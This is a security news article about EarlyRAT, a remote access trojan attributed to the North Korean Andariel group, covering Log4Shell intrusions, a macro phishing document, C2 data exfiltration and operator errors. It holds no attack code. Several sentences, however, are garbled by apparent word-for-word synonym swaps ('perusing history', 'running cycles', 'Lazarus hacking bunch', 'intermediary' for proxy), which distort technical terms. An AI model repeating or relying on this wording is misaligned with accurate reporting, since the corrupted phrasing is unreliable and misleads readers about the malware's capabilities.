‘EarlyRAT,’ a remote access trojan (RAT) used by Andariel, a subgroup of the Lazarus North Korean state-sponsored hacking group, has been discovered by security analysts.
Andariel (also known as Stonefly) is accepted to be important for the Lazarus hacking bunch known for utilizing the DTrack particular indirect access to gather data from compromised frameworks, like perusing history, composed information (keylogging), screen captures, running cycles, and that’s only the tip of the iceberg.
A North Korean group using a more recent version of DTrack—possibly Andariel—collected valuable intellectual property for two months, according to a more recent WithSecure report.
Kaspersky has also linked Andariel to deployments of the Maui ransomware in Russia, India, and Southeast Asia, indicating that the threat group frequently focuses on making money.
EarlyRAT is used by the hacking group to gather system data from the compromised devices and send it to the attacker’s C2 (command and control) server.
Kaspersky’s discovery of the RAT assists defenses in identifying and stopping associated intrusions and adds yet another piece to the group’s arsenal.
EarlyRAT
While looking into an Andariel campaign that began in mid-2022, where threat actors were using Log4Shell to get into business networks, Kaspersky came across EarlyRAT.
Andariel performed network reconnaissance, credential theft, and lateral movement using open-source tools including 3Proxy, Putty, Dumpert, and Powerline by taking advantage of a vulnerability in the Log4j program.
Additionally, the investigators discovered a phishing document in these assaults that employed macros to retrieve an EarlyRAT payload from a site connected to previous Maui ransomware campaigns.
EarlyRAT is a straightforward program that immediately starts gathering system data and sending it via a POST request to the C2 server.
Executing commands on the infected system, possibly to download additional payloads, exfiltrate valuable data, or disrupt system operations, is EarlyRAT’s second primary function.
Kaspersky does not go into detail on that front, but it does state that EarlyRAT is very similar to MagicRAT, another tool used by Lazarus that creates scheduled tasks and downloads additional malware from the C2.
The scientists say that the inspected EarlyRAT exercises appeared to be executed by an unpracticed human administrator, given the quantity of mix-ups and errors.
It was seen that different orders executed on the penetrated network gadgets were physically composed and not hardcoded, frequently prompting mistake initiated blunders.
Comparative heedlessness uncovered a Lazarus mission to WithSecure’s investigators last year, who saw an administrator of the gathering neglect to utilize an intermediary toward the beginning of their working day and uncover their North Korean IP address.
